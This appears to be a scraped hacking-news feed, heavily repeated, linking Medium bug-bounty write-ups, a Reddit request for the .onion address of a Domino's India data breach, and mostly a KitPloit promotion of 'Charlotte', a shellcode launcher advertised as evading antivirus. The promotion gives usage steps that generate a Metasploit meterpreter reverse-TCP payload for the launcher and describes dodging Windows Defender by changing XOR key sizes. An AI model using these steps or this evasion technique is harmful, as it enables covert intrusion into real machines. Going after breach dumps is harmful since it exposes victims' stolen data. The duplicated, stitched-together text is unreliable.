Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Detect WiFi jamming attempts with Wireshark
https://cdn-images-1.medium.com/max/800/1*6TtvIBfqo5IUrSncu6g9yA.jpeg
Most DOS assaults are entirely essential and exploit well-recorded imperfections in the manner WPA systems oversee associations. Since the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Detect WiFi jamming attempts with Wireshark
https://cdn-images-1.medium.com/max/800/1*6TtvIBfqo5IUrSncu6g9yA.jpeg
Most DOS assaults are entirely essential and exploit well-recorded imperfections in the manner WPA systems oversee associations. Since the…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Detect WiFi jamming attempts with Wireshark
Most DOS assaults are entirely essential and exploit well-recorded imperfections in the manner WPA systems oversee associations. Since the…
Deep Web
Where can i find the .onion address for dominos india data breach?
submitted by /u/ZakX10
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Where can i find the .onion address for dominos india data breach?
submitted by /u/ZakX10
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Where can i find the .onion address for dominos india data breach?
Posted in r/deepweb by u/ZakX10 • 1 point and 0 comments
Biggest Mistake Bounty hunters are Making Right Now.
https://youcantseeme.medium.com/biggest-mistake-bounty-hunters-are-making-right-now-ff95f9bbc3fa?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://youcantseeme.medium.com/biggest-mistake-bounty-hunters-are-making-right-now-ff95f9bbc3fa?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Biggest Mistake Bounty hunters are Making Right Now.
Bug Bounty hunter the legends who protect the web app to IoT refrigerator from bad guys to make everyone life at least 1% better than…
Bug Bounty hunter the legends who protect the web app to IoT refrigerator from bad guys to make everyone life at least 1% better than…Continue reading on Medium » (https://youcantseeme.medium.com/biggest-mistake-bounty-hunters-are-making-right-now-ff95f9bbc3fa?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Biggest Mistake Bounty hunters are Making Right Now.
Bug Bounty hunter the legends who protect the web app to IoT refrigerator from bad guys to make everyone life at least 1% better than…
Disclose leads form details of any Facebook Business Account or Facebook Page (Bug Bounty)
https://amineaboud.medium.com/disclose-leads-form-details-of-any-facebook-business-account-or-facebook-page-bug-bounty-7ecae6cff312?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://amineaboud.medium.com/disclose-leads-form-details-of-any-facebook-business-account-or-facebook-page-bug-bounty-7ecae6cff312?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Disclose leads form details of any Facebook Business Account or Facebook Page (Bug Bounty)
By chaining two GraphQL IDOR vulnerabilities affecting the Facebook Leads Center a malicious user could have exposed the leads form details…
By chaining two GraphQL IDOR vulnerabilities affecting the Facebook Leads Center a malicious user could have exposed the leads form…Continue reading on Medium » (https://amineaboud.medium.com/disclose-leads-form-details-of-any-facebook-business-account-or-facebook-page-bug-bounty-7ecae6cff312?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Disclose leads form details of any Facebook Business Account or Facebook Page (Bug Bounty)
By chaining two GraphQL IDOR vulnerabilities affecting the Facebook Leads Center a malicious user could have exposed the leads form details…
Stored XSS and html Injection on Subdomain NUS ( https://nusit.nus.edu.sg/ )
https://baguslindu.medium.com/asslamualaikum-wr-wb-8273abedefe1?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://baguslindu.medium.com/asslamualaikum-wr-wb-8273abedefe1?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Asslamualaikum wr.wbContinue reading on Medium » (https://baguslindu.medium.com/asslamualaikum-wr-wb-8273abedefe1?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Stored XSS and html Injection on Subdomain NUS ( https://nusit.nus.edu.sg/ )
Asslamualaikum wr.wb
Stored XSS and html Injection on Subdomain NUS ( https://nusit.nus.edu.sg/ )
Asslamualaikum wr.wbContinue reading on Medium »
Read more...
Asslamualaikum wr.wbContinue reading on Medium »
Read more...
Charlotte - C++ Fully Undetected Shellcode Launcher
c++ fully undetected shellcode launcher ;) releasing this to celebrate the birth of my newborndescription 13/05/2021: c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021. dynamic invoking of win32 api functions XOR encryption of shellcode and function names randomised XOR keys and variables per run on Kali Linux, simply 'apt-get install mingw-w64*' and thats it! 17/05/2021: random strings length and XOR keys length antiscan.me usage git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py example: git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64* cd charlotte msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin python charlotte.py profit tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload update v1.1 17/05/21: apparently Microsoft Windows Defender was able to detect the .DLL binary, and how did they flag it? by looking for several XOR keys of 16 byte size changing it to 9 shown in the POC .gif below shows it is now undetected again cheers! Download Charlotte
Read more...
___________________________
@hacking_Attack
@Hacking_Video
c++ fully undetected shellcode launcher ;) releasing this to celebrate the birth of my newborndescription 13/05/2021: c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021. dynamic invoking of win32 api functions XOR encryption of shellcode and function names randomised XOR keys and variables per run on Kali Linux, simply 'apt-get install mingw-w64*' and thats it! 17/05/2021: random strings length and XOR keys length antiscan.me usage git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py example: git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64* cd charlotte msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin python charlotte.py profit tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload update v1.1 17/05/21: apparently Microsoft Windows Defender was able to detect the .DLL binary, and how did they flag it? by looking for several XOR keys of 16 byte size changing it to 9 shown in the POC .gif below shows it is now undetected again cheers! Download Charlotte
Read more...
___________________________
@hacking_Attack
@Hacking_Video
GitHub
GitHub - 9emin1/charlotte: c++ fully undetected shellcode launcher ;)
c++ fully undetected shellcode launcher ;). Contribute to 9emin1/charlotte development by creating an account on GitHub.
Hacking Articles Tips Tricks Videos Tutorials
GIF
KitPloit - PenTest Tools!
Charlotte - C++ Fully Undetected Shellcode Launcher
https://1.bp.blogspot.com/-Wer4vt3GJ7M/YKS3X32T89I/AAAAAAAAWOY/Zfw80BY8yDcMdCruh1cDWqCy2it2nhXqQCNcBGAsYHQ/w640-h292/charlotte_2_demo-poc.gif
c++ fully undetected shellcode launcher ;)
releasing this to celebrate the birth of my newborn
description
13/05/2021:
1. c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.
2. dynamic invoking of win32 api functions
3. XOR encryption of shellcode and function names
4. randomised XOR keys and variables per run
5. on Kali Linux, simply 'apt-get install mingw-w64*' and thats it!
17/05/2021:
1. random strings length and XOR keys length
antiscan.me
https://1.bp.blogspot.com/-yF099ISqHFQ/YKS3ffum1yI/AAAAAAAAWOc/OzStm1OM5E8zSNX7JRsdOIfoqPVTSMWmQCNcBGAsYHQ/w640-h380/charlotte_1_0-detection-charlotte.png
usage
git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py
example:
1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
2. cd charlotte
3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
4. python charlotte.py
5. profit
tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload
https://1.bp.blogspot.com/-wPKeBDrIxpY/YKS3mvZHYJI/AAAAAAAAWOg/lfKyVCgImrQIYQezletisHAzIFeKrm3bACNcBGAsYHQ/w640-h292/charlotte_2_demo-poc.gif
update v1.1
17/05/21:
apparently Microsoft Windows Defender was able to detect the .DLL binary,
and how did they flag it? by looking for several XOR keys of 16 byte size
changing it to 9 shown in the POC .gif below shows it is now undetected again
cheers!
https://1.bp.blogspot.com/-8T7o4kfOp6I/YKS3t1if_oI/AAAAAAAAWOo/0JfzKVKkTJcZdViYsv8cQqSb6wV1HQLUgCNcBGAsYHQ/w640-h320/charlotte_3_demo-poc2.gif
Download Charlotte
___________________________
@hacking_Attack
@Hacking_Video
Charlotte - C++ Fully Undetected Shellcode Launcher
https://1.bp.blogspot.com/-Wer4vt3GJ7M/YKS3X32T89I/AAAAAAAAWOY/Zfw80BY8yDcMdCruh1cDWqCy2it2nhXqQCNcBGAsYHQ/w640-h292/charlotte_2_demo-poc.gif
c++ fully undetected shellcode launcher ;)
releasing this to celebrate the birth of my newborn
description
13/05/2021:
1. c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021.
2. dynamic invoking of win32 api functions
3. XOR encryption of shellcode and function names
4. randomised XOR keys and variables per run
5. on Kali Linux, simply 'apt-get install mingw-w64*' and thats it!
17/05/2021:
1. random strings length and XOR keys length
antiscan.me
https://1.bp.blogspot.com/-yF099ISqHFQ/YKS3ffum1yI/AAAAAAAAWOc/OzStm1OM5E8zSNX7JRsdOIfoqPVTSMWmQCNcBGAsYHQ/w640-h380/charlotte_1_0-detection-charlotte.png
usage
git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py
example:
1. git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
2. cd charlotte
3. msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
4. python charlotte.py
5. profit
tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike raw format payload
https://1.bp.blogspot.com/-wPKeBDrIxpY/YKS3mvZHYJI/AAAAAAAAWOg/lfKyVCgImrQIYQezletisHAzIFeKrm3bACNcBGAsYHQ/w640-h292/charlotte_2_demo-poc.gif
update v1.1
17/05/21:
apparently Microsoft Windows Defender was able to detect the .DLL binary,
and how did they flag it? by looking for several XOR keys of 16 byte size
changing it to 9 shown in the POC .gif below shows it is now undetected again
cheers!
https://1.bp.blogspot.com/-8T7o4kfOp6I/YKS3t1if_oI/AAAAAAAAWOo/0JfzKVKkTJcZdViYsv8cQqSb6wV1HQLUgCNcBGAsYHQ/w640-h320/charlotte_3_demo-poc2.gif
Download Charlotte
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Charlotte - C++ Fully Undetected Shellcode Launcher
Charlotte - C++ Fully Undetected Shellcode Launcher
http://www.kitploit.com/2021/05/charlotte-c-fully-undetected-shellcode.html
___________________________
@hacking_Attack
@Hacking_Video
http://www.kitploit.com/2021/05/charlotte-c-fully-undetected-shellcode.html
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Charlotte - C++ Fully Undetected Shellcode Launcher
c++ fully undetected (https://www.kitploit.com/search/label/Undetected) shellcode launcher ;) releasing this to celebrate the birth of my newborn
description
13/05/2021: c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021. dynamic invoking of win32 api functions XOR encryption (https://www.kitploit.com/search/label/Encryption) of shellcode and function names randomised XOR keys and variables per run on Kali Linux, simply 'apt-get install mingw-w64*' and thats it! 17/05/2021: random strings length and XOR keys length
antiscan.me
___________________________
@hacking_Attack
@Hacking_Video
description
13/05/2021: c++ shellcode launcher, fully undetected 0/26 as of 13th May 2021. dynamic invoking of win32 api functions XOR encryption (https://www.kitploit.com/search/label/Encryption) of shellcode and function names randomised XOR keys and variables per run on Kali Linux, simply 'apt-get install mingw-w64*' and thats it! 17/05/2021: random strings length and XOR keys length
antiscan.me
___________________________
@hacking_Attack
@Hacking_Video
KitPloit - PenTest & Hacking Tools
Leading source of security tools, hacking tools, cybersecurity and network security. Learn about new tools and updates in one place.
usage
git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py example: git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64* cd charlotte msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin python charlotte.py profit
tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike (https://www.kitploit.com/search/label/Cobalt%20Strike) raw format payload
___________________________
@hacking_Attack
@Hacking_Video
git clone the repository, generate your shellcode file with the naming beacon.bin, and run charlotte.py example: git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64* cd charlotte msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin python charlotte.py profit
tested with msfvenom -p (shown in the .gif POC below) and also cobalt strike (https://www.kitploit.com/search/label/Cobalt%20Strike) raw format payload
___________________________
@hacking_Attack
@Hacking_Video
GitHub
GitHub - 9emin1/charlotte: c++ fully undetected shellcode launcher ;)
c++ fully undetected shellcode launcher ;). Contribute to 9emin1/charlotte development by creating an account on GitHub.